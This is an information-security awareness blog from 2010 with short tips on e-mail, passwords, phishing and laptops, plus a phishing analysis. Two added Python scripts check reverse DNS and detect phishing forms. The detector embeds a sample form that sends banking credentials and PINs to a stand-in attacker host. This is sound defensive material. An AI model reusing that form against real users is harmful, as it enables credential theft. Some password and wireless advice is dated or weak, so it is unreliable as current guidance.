
Tuesday, November 23, 2010

10 tips for securely managing e-mail

“As an IT manager, looking after your company email can be a major headache. Being one of the primary portals for security threats and other IT issues, it is vital that email is properly managed to protect assets and ensure employees remain productive,” says Leon Rishniw, senior vice president of engineering, Cloudmark.

1. Educate your employees: Educate and remind your users about the dangers of forwarding jokes, racy content, chain letters or political messages outside your network, as recipients are likely to report these as spam and your IP will get listed. You should also make your users aware that if they include a signature line that includes the company’s URL and phone/fax numbers, their emails are also likely to get blocked.

2. Educate your marketing department: Ensure your marketing department doesn't send out newsletters/ads using your normal outbound IP, as recipients will report the mailings as spam and your IP will get listed. Outbound mail should be restrictive, filtered and encryption authenticated. Do not build opt-out mailing lists, and be very quick to remove any subscribers that do not wish to be on the list. Another point to consider is that a virus outbreak that sends email you do not know about can cause your domain or network space to become blacklisted. Lastly, force outbound mail to go through servers that you control rather than going out directly.

3. Monitor: Keeping an eye on aspects such as inbound/outbound network traffic, service traffic, inbound connection attempts and port scans can help determine if your system has been compromised or if you need to take action.

4. Control your systems: Keep your systems locked down. It is important that you restrict inbound connections to any ports that you do not need to keep open. Ensure that all PCs require SMTP authentication on outbound mail, and force mail to go through your outbound MTAs (block port 25 connections outbound).

5. Use email authentication technologies: Use email authentication technologies and understand how the technology evolves. Email authentication technology is here to stay so it is important to learn how it can be leveraged to benefit your company, both when sending and receiving emails.

6. Stay up to date with patches: It’s a bit of a cliché but you must keep up to date with patches. This is important, not only on desktop computers but on servers as well. Viruses are not the only problem; a weak web application can also be exploited. For example, it can send an email you didn’t mean to send, irritating the recipients and earning your domain or IP address a bad reputation that could interfere with your regular messaging operations.

7. Configure your email server correctly: Ensure your Internet-facing email server environment is configured to validate recipients at reception time against your local LDAP system; otherwise you’ll generate a lot of “backscatter” traffic when mail for non-existent recipients is accepted and then bounced by your internal Exchange/Notes/Zimbra/etc. server. This will get you blacklisted very quickly.

8. Set DNS protocols correctly: Make sure your forward and reverse DNS for your outbound hosts match.

9. Other security tips: Get to know the major RBLs now rather than scrambling around when your outbound IP address inevitably gets listed due to a bot-infected PC on your network. Also, deploy BATV to ensure you don’t receive bounces for spoofed content that you never originated.

10. Watch out for ‘free’ enterprise ready software: If you are serious about protecting your users (and your job), invest in one of the top commercial anti-spam software products.
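Tips 8 and 9 can be checked in code. The following Python script is an added example, not part of the original article: it performs a forward-confirmed reverse DNS check against an injectable resolver (constructed sample records here, the system resolver for real use) and builds the reversed-octet query name used for DNS-based blocklist lookups; the blocklist zone rbl.example and the 192.0.2.x hosts are placeholders.

```python
"""Outbound-MTA hygiene checks from tips 8 and 9: forward-confirmed reverse
DNS (the PTR name must resolve back to the IP) and DNSBL query-name building.

Added example, not from the original article. Lookups are injectable so the
checks run offline against constructed sample records; system_ptr/system_a
wrap the standard-library resolver for real use.
"""
import ipaddress
import socket
from typing import Callable, Dict, List

# Constructed sample DNS data (documentation range, not real hosts).
SAMPLE_PTR: Dict[str, str] = {
    "192.0.2.10": "mta1.example.test",  # PTR and A agree: good outbound host
    "192.0.2.11": "mail.example.test",  # PTR exists, but A points elsewhere
    "192.0.2.12": "",                   # no PTR record at all
}
SAMPLE_A: Dict[str, List[str]] = {
    "mta1.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.20"],
}

def sample_ptr(ip: str) -> str:
    return SAMPLE_PTR.get(ip, "")

def sample_a(name: str) -> List[str]:
    return SAMPLE_A.get(name, [])

def system_ptr(ip: str) -> str:
    """Real reverse lookup; empty string when no PTR exists."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return ""

def system_a(name: str) -> List[str]:
    """Real forward lookup; empty list when the name does not resolve."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except OSError:
        return []

def fcrdns_check(ip: str,
                 ptr_lookup: Callable[[str], str] = sample_ptr,
                 a_lookup: Callable[[str], List[str]] = sample_a) -> dict:
    """Tip 8: forward and reverse DNS for an outbound host must match, i.e.
    the PTR name's A records must include the original IP."""
    addr = str(ipaddress.ip_address(ip))  # validates and normalises the IP
    ptr = ptr_lookup(addr).rstrip(".").lower()
    if not ptr:
        return {"ip": addr, "ptr": "", "forward": [], "ok": False,
                "reason": "no PTR record"}
    forward = a_lookup(ptr)
    ok = addr in forward
    return {"ip": addr, "ptr": ptr, "forward": forward, "ok": ok,
            "reason": "ok" if ok else "PTR name does not resolve back to the IP"}

def dnsbl_query_name(ip: str, zone: str) -> str:
    """Tip 9: name to resolve when asking a DNS-based blocklist about an IPv4
    address: octets reversed, then the list's zone appended. A listed address
    answers with an A record (conventionally 127.0.0.x); NXDOMAIN means not
    listed. `zone` is a placeholder for whichever list you use."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone.rstrip(".")

if __name__ == "__main__":
    for host in SAMPLE_PTR:
        print(fcrdns_check(host))
    print(dnsbl_query_name("192.0.2.10", "rbl.example"))
```

Run the check over each of your outbound MTAs with system_ptr and system_a before they send production mail; a mismatch is what receiving servers see as well.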


Source: www.net-security.org/

Wednesday, October 27, 2010

Letting Family or Friends Use Your Employer's Computers Can Be Bad for You !!!

A candidate for Parliament in the UK received a lot of bad publicity when people took offense at a message her husband sent from her Council email account. She isn't the first person to get into trouble over a family member misusing their work email account or PC. Very few organizations let employees' families use their PCs. If you work from home on a corporate PC, then check your company policy and clarify boundaries with household members.


Source: sans.org

Monday, October 18, 2010

Print out important documents

A digital photography expert told me that CDs are expected to "live" for up to ten years. I want kids—and maybe grandkids—to see photos, so I print the best ones. Same goes for documents: print important files so that they are accessible in future decades. Of course, you want to back up these files too.


Source: sans.org

Monday, October 11, 2010

Don't click the "unsubscribe" link at the bottom of unsolicited emails

Spam filters are catching most unwanted e-mail, but some might still reach you. Most spam is designed to get you to respond with your own email or to click a link to "unsubscribe." When you respond or click the "unsubscribe" link, the sender takes your email address and adds it to a SPAM database of active email addresses. You might then start to receive a large amount of SPAM in your inbox. Do not respond or click the "unsubscribe" links.


Source: sans.org

Thursday, October 7, 2010

Don't check "remember my password" boxes

Numerous programs offer the option of "remembering" your password. Unfortunately, many of them have no built-in security measures to protect that information. Some programs actually store the password in clear text in a file on the computer. This means anyone with access to the computer can read the password. It's best to retype your password each time you log in, eliminating the possibility that someone will be able to steal or use it.


Source: sans.org

Tuesday, October 5, 2010

Get it out of the car

Don't leave your laptop in the car - not on the seat, not in the trunk. Parked cars are a favorite target of laptop thieves; don't help them by leaving your laptop unattended. If you must leave your laptop behind, keep it out of sight.

Source: sans.org

Monday, October 4, 2010

Turn off the message preview pane in Outlook or Outlook Express

If the message preview pane is enabled, the messages in your inbox are automatically "opened" as you scroll through them. While this is convenient, it also poses a potential security risk. If you disable the preview pane, you can delete any email that looks suspicious BEFORE it's opened and avoid a possible virus infection.


Source: sans.org

Monday, September 27, 2010

Review your credit reports routinely

The Fair Credit Reporting Act (FCRA) requires each of the nationwide consumer reporting companies — Equifax, Experian, and TransUnion — to provide you with a free copy of your credit report, at your request, once every 12 months. Take advantage of these free reports, and verify the information that they contain.


Source: sans.org

Friday, September 24, 2010

Phishing attack leveraging SMS ban

This morning was going as usual until I noticed an email. It seemed to originate from AXIS Bank, it had an HTML attachment, and it was an important announcement.

The contents of the email looked valid, considering the Government of India had placed a ban on sending bulk SMS until the 29th. Now I am not sure whether such a ban holds good for financial institutions, but some smart bloke seems to have capitalized on it. The email stated that:

“In view of the Govt. of India directive to mobile operators, all the corporate sms messaging services have been blocked for the next 72 hours. This period may increase. In view of this exigency, Axis Bank Net Secure Code and transaction alerts delivery has been effected. Therefore, till the Govt. of India permits restoration of the system.

Axis Bank customers may not be able to conduct Internet Banking transactions that use SMS for delivering the NetSecure code. This is a regulation by Govt. of India and beyond Axis Bank’s control.

We have attached a form to this email. Please DOWNLOAD the form attached to this email so that you can fill and submit it Online to us , so that we can verify your account , After the Govt. of India permits restoration of the system. .
NOTE: The form needs to be opened in a modern browser which has javascript enabled ( Internet Explorer 7, Firefox 3, Safari 3, Opera 9)”

Now, unlike the other phishing emails that I have encountered, this one seemed different: the content (read: grammar) also looks more like it came from a professional agency, and it is in step with the events that are happening in India.

This is the snapshot of the email:

[Image: phishing email targeting Axis Bank]

I opened the HTML attachment after a customary scan with AV. Now, although this looks authentic, it is a bit suspicious because it asks for too many private details, which should evoke second thoughts from anybody. Generally, any phishing attack would ask for username, password and CVV details at the most. But this one prompts for ATM PIN, transaction password, Secure Code/Verified by Visa, and email details. And unlike others where you enter the details on a site, it sends an attachment to be filled in and submitted. The modus operandi is slightly different.

I bet someone who is familiar with Axis Bank's online transaction mechanism has set this up, because Axis Bank requires a transaction password in addition to the details mentioned above for an online transaction. Now, the form is an HTML attachment, and when you open it everything looks authentic; just take a look below.

[Image: phishing HTML attachment targeting Axis Bank]

This is it, but once you look at the page source carefully you will realize the bait: using the POST method, all details would go to the URL specified instead of to Axis Bank:

[Image: phishing form URL targeting Axis Bank]

A Whois lookup for the domain above lists it as based out of Poland. All I can do is notify Axis Bank of this. It would have been better if the Government of India or the financial institutions had made it clear whether their services would continue to operate or be impeded due to this SMS ban.

Take care, and please spread the word to ensure people do not fall for this.

UPDATE:

I would have thought that the content in their email was written by a smart bloke, but it’s actually flicked from Axis Bank’s login page!
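The manual page-source check described in the post can be automated. The following Python script is an added example, not code from the original post: it parses an HTML attachment, records where each form posts, and flags forms that send sensitive fields (PINs, passwords, secure codes) to a host outside the claimed sender's domain. The sample attachment, the host phish-host.example and the bank domain bank.example are constructed placeholders, not the real URLs from the incident.

```python
"""Triage an HTML e-mail attachment the way the post does by hand: find every
form, see where it posts, and list the sensitive fields it collects.

Added example, not code from the original post. The attachment below is
constructed to resemble the one described; the form's action host and the
bank's own domain are placeholders.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

# Constructed sample attachment: bank-looking form, third-party action URL.
SAMPLE_ATTACHMENT = """
<html><body>
<h2>NetSecure verification form</h2>
<form method="POST" action="http://phish-host.example/collect.php">
  Login ID <input name="loginid">
  Login password <input type="password" name="loginpwd">
  Transaction password <input type="password" name="txnpwd">
  ATM PIN <input name="atmpin">
  Verified by Visa code <input name="securecode">
  Email password <input type="password" name="emailpwd">
  <input type="submit" value="Submit">
</form>
</body></html>
"""

# Field-name fragments a legitimate "verification" form should never request.
SENSITIVE_MARKERS = ("pin", "pwd", "password", "cvv", "securecode", "passcode")

class FormCollector(HTMLParser):
    """Collects each <form>'s method, action and the names of its inputs."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict] = []
        self._current: Optional[Dict] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"method": (a.get("method") or "GET").upper(),
                             "action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            kind = (a.get("type") or "text").lower()
            if kind not in ("submit", "button", "hidden", "reset"):
                self._current["fields"].append(a.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def analyse_attachment(html: str, trusted_domains: Set[str]) -> List[Dict]:
    """Return one finding per form. A form is off-site when its action host is
    not the claimed sender's domain (or a subdomain of it); an empty host means
    a relative action, which an attachment has no trusted origin for."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        on_site = any(host == d or host.endswith("." + d) for d in trusted_domains)
        sensitive = [n for n in form["fields"]
                     if any(m in n.lower() for m in SENSITIVE_MARKERS)]
        verdict = "phishing-likely" if (not on_site and sensitive) else "review"
        findings.append({"method": form["method"], "action_host": host,
                         "offsite": not on_site, "sensitive_fields": sensitive,
                         "verdict": verdict})
    return findings

if __name__ == "__main__":
    for finding in analyse_attachment(SAMPLE_ATTACHMENT, {"bank.example"}):
        print(finding)
```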

Tuesday, September 21, 2010

Treat your laptop like cash !!!

If you had a wad of money sitting out in a public place, would you turn your back on it - even for just a minute? Would you put it in checked luggage? Leave it on the backseat of your car? Of course not. Keep a careful eye on your laptop just as you would a pile of cash.

Visit http://onguardonline.gov/laptop.html for more information.


Source: sans.org

Friday, September 17, 2010

VoIP: It's a phone, it's a computer, it's...

Voice over Internet Protocol (VoIP) is one way people are making and receiving telephone calls using an Internet connection rather than a regular phone line. VoIP services can also be attacked by computer viruses, worms, or spam over Internet telephony (SPIT). Here is how it works: VoIP converts your phone call -- actually, the voice signal from your phone -- into a digital signal that travels over the Internet to the person you are calling. If you are calling a plain old telephone number, the signal is converted back at the other end. If you're comfortable with new technology, you may want to learn more about VoIP. It's smart to do some research on this technology before signing up for it.

Source: sans.org

Wednesday, September 15, 2010

It's 10 p.m. Do you know whom your kids are chatting with online?

While social networking sites can increase a person's circle of friends, they also can increase exposure to people with less than friendly intentions. Here are tips for helping your kids use social networking sites safely:

  • Help your kids understand what information should be private.
  • Explain that kids should post only information that you - and they - are comfortable with others seeing.
  • Use privacy settings to restrict who can access and post on your child's website.
  • Remind your kids that once they post information online, they can't take it back.
  • Talk to your kids about avoiding sex talk online.
  • Tell your kids to trust their gut if they have suspicions. If they ever feel uncomfortable or threatened by anything online, encourage them to tell you.
Source: sans.org

Tuesday, September 14, 2010

Don't get hooked by a Phishing expedition

  • Don't reply to email or pop-up messages that ask for personal or financial information, and don't click on links in the message.
  • Don't cut and paste a link from the message into your Web browser -- phishers can make links look like they go one place, but actually send you to a different site.
  • Use anti-virus and anti-spyware software, as well as a two-way firewall, and update them all regularly.
  • Don't send personal or financial information by email.
  • Be cautious about opening any attachment or downloading any files from emails you receive regardless of who sent them.
Source: sans.org

Monday, September 13, 2010

If your personal information is stolen, four steps to take !!!

It's important to protect your personal information, and to take certain steps quickly to minimize the potential damage from identity theft if your information is accidentally disclosed or deliberately stolen:

  • Place a "Fraud Alert" on your credit reports, and review those reports carefully. Notifying one of the three nationwide consumer reporting companies is sufficient.
  • Contact your bank or other financial institution(s) and close any accounts that have been tampered with or established fraudulently.
  • File a police report with local law enforcement officials. This is an essential step for protecting your rights.
  • Report your theft to the Federal Trade Commission, online, by phone, or by mail.

Source: sans.org

Friday, September 10, 2010

Secure your Wireless Router

When setting up a wireless network at home, I was surprised to be able to connect to my neighbor's unsecured wireless router. Not only could I have used his bandwidth for free, but had I been so inclined, I could have used the connection for illegal activities. If the police came looking, he may not have been able to prove the activity didn't come from one of his computers. Properly securing wireless is not hard. Look in the manual for changing the SSID to something unique, turning on WPA (avoid WEP) for authentication and TKIP for encryption, and using MAC address filtering.

For more details contact me, or Google it.


Source: sans.org

Wednesday, September 8, 2010

Choose a password that's hard to crack

When choosing a password, try to make it by writing a sentence that you can easily remember. For example: "Los Angeles Lakers will win the NBA tournament this year". Then pick up the first letters of each word and also add at the beginning or at the end (or at both parts) some special characters and numbers. For example, with the last sentence you could get the password: =3LALwwtNtty$. This method lets you come up with easy-to-remember passwords that are also hard to crack. And you avoid the need to write such a long password down in order to remember it.


Source: sans.org

Monday, September 6, 2010

Do not give your password over the phone to anyone claiming to be from the HelpDesk or Tech Support

No one from the HelpDesk or Tech Support will ever ask you for your password. If we need to access your account for some reason, and cannot contact you in time, we will reset the password and notify you by voicemail. Anyone calling and asking you for your password is most likely trying to gain unauthorized access to our network. If you receive such a call, notify your supervisor immediately.

Source: sans.org

Friday, September 3, 2010

Don't use e-mail to send private messages

In a hospital romance right out of prime time television, one young woman involved in a three-way love triangle used her personal hotmail account to send romantic messages. She got a response she definitely did not expect: the party she had been cheating on cracked into her hotmail account, printed out some very personal messages and posted them on the message board at the small town supermarket for all to see. Moral of the story: protect your passwords. And PS. As long as you're planning on getting fired, you're better off spending time working on your resume than sending romantic e-mails that you don't want publicized.



Source: sans.org

Wednesday, September 1, 2010

Don't buy anything from a spammer

If an unexpected email brings you news that seems too good to be true, it is probably spam and a scam. If you didn't request information about the product or service, it is probably spam and a scam. If it promises to enhance parts of your body, it won't. If it promises you an easy mortgage, you can do better by visiting your bank. If it promises that you can make a fortune on a penny stock, you can't. If you are unsure, ask five friends. Chances are four of them also received the spam, and you will know to steer clear.


Source: sans.org

Monday, August 30, 2010

Avoid Ad-hoc wireless networks

Disable automatic connection to any new networks and limit your connections to access point (infrastructure) networks only:
  • Click the "Start" button and navigate to the "Control Panel" and then to "Network Connections."
  • Right mouse-click on the "Wireless Network Connection" and choose "Properties".
  • Pick the "Wireless Networks" tab, then the "Advanced" button:
    • Make sure that the check box next to "automatically connect to non-preferred networks" is not checked.
    • Click on Access point (infrastructure) networks only to avoid ad hoc networks.

This configuration prevents you from automatically connecting to any new networks and refuses all ad-hoc networks, which have the potential to monitor traffic that passes through them.


Source: sans.org

Friday, August 27, 2010

Never respond to an email asking for personal information

Companies you do business with should never ask for account information, credit card numbers or PIN information in an email message. If you have any questions about an email you receive that supposedly comes from your financial institution, call the local branch office. Do NOT respond to the email.


Source: sans.org

Thursday, August 26, 2010

Avoid spam in your IM email account

Did you ever sign up with an Instant Messenger client so that you could chat with your buddies? Perhaps you have more than one running on the desktop. Each popular IM client conveniently comes with an email account, and each time an email arrives for the address tied to your IM screen name, you receive a notice while that account fills up. You can prevent the spam, or any email notices, from appearing with a single filter. Since I added the following filter on the email account attached to my Yahoo IM, I no longer get these notifications. Simply add a filter so that any message whose From address includes "@" goes directly to the trash. You will be able to communicate with all your IM buddies without the hassle of being notified of items coming into the inbox.

Source: sans.org

Wednesday, August 25, 2010

Paper files Have to Be Protected Too

You've probably heard that To err is human, but to foul things up completely you need a computer. We know it's important to protect the big databases that we store, but we can't ignore paper records. The amount of information held on paper may be much smaller, but many of the most serious leaks happen through very human methods — reports stolen from desktops or read over someone's shoulder. Keep sensitive paper files locked away when they are not being used and don't read them in public places.


Source: sans.org

Tuesday, August 24, 2010

Lock your workstation before you leave your desk

Did you know there are keyboard shortcuts other than CTRL+ALT+DEL that you can use to lock your desktop? This will prevent people from walking up and snooping on your computer. You can save a keystroke by simultaneously pressing the Windows key + L. The Windows key has four wavy squares.

Or, to make things even easier, create a desktop shortcut.
  1. Right click any empty area of your desktop
  2. Click New
  3. Click Shortcut
  4. Type in the following: rundll32.exe user32.dll, LockWorkStation
  5. Click Next
  6. Name your shortcut
  7. Click Finish

Now it's as easy as a double click!

Source: sans.org

Monday, August 23, 2010

Don't tell ANYONE your password

One way someone could learn your password is to phone you claiming to be from another part of your organization, maybe your IT or Audit teams, and say they need your account details to let them investigate a problem. This should never be necessary. Good systems are set up so that nobody but you will ever know your password, and authorized IT workers have their own accounts giving them access to what they need.

Source: sans.org

Friday, August 20, 2010

Passwords: Be creative


If you can't remember hard passwords no matter how hard you try, put your password in parentheses. baseball38 is a weak password. (baseball38) is much better.

When you change your password, you should always change at least half of it and when you do, change the parentheses as well. Change the parentheses to asterisks, exclamation points or dollar signs. *sallyandbob39* is better than sallyandbob39, and !jimandbetty93! is better than jimandbetty93.


Source: sans.org

Thursday, August 19, 2010

Do NOT open unknown or unexpected e-mail attachments

This morning I got an e-mail from my boss with an attachment. My boss is a man of few words on e-mail. If he wants to explain or discuss something with me, he picks up the phone. When he wants me to read or edit something we have talked about, he sends it to me. Even though the subject line was a date, the e-mail had no text, AND my boss hadn't told me he was sending me an attachment, I opened it because it was from my boss at an e-mail address I recognized. Bad move. Imagine my surprise when my Norton anti-virus screen popped up with a message that the attachment contained a virus and had been deleted. Hackers had spoofed his address and I had fallen for it.


Source: sans.org

Wednesday, August 18, 2010

Check and make sure your friend sent that great screen saver

A common method of transmitting malware is by infecting some unsuspecting user's computer and then using that computer to infect others. One simple way to do this is for a hacker to hijack your address book and send copies of the malware to everyone in that address book. Of course, YOU need to be enticed to run the malware, and the best way to do that is to fool you into thinking the attachment is something else. If a friend or acquaintance sends you a "great screensaver" or something like that, which you were not expecting, take a few minutes to confirm that person really sent it. If they know nothing about it, then delete the message.


Source: sans.org

Tuesday, August 17, 2010

Don't Accept Offers of "Free PC Scans" That Pop up When You Use the Internet


Secure Computers LLC paid a $1,000,000 fine for offering "free spyware scans" that told users their systems had been infected with spyware, even if the system was clean. They are not the only ones doing this — when you surf the Web you are still likely to see pop-up windows like that. Some "scans" don't just give misleading results; they actually try to install unwanted software on your PC. Often the screen pop-ups only have a "scan" button and no "cancel" or "quit" option. In fact they could interfere with your PC no matter which of the buttons you choose. Be safe: close pop-ups like this by clicking on the X in the top right corner of the browser window. Better yet, use a pop-up blocker software (http://www.vnunet.com/vnunet/news/2170208/security-firm-pay-million-false).


Source: sans.org

Monday, August 16, 2010

How to spot a phishing email...

It could be a phishing email if...
  • There are misspelled words in the e-mail or it contains poor grammar.
  • The message is asking for personally identifiable information, such as credit card numbers, account numbers, passwords, PINs or Social Security Numbers.
  • There are "threats" or alarming statements that create a sense of urgency. For example: "Your account will be locked until we hear from you" or "We have noticed activity on your account from a foreign IP address."
  • The domain name in the message isn't the one you're used to seeing. It's usually close to the real domain name but not exact. For example:
Source: sans.org

Motive of this blog

Sharing and updating of anything related to Information Security.
To bring the collective expertise of Information Security practitioners under one umbrella.
To discuss and clarify Information Security related topics.
Bring out awareness & importance of Information Security.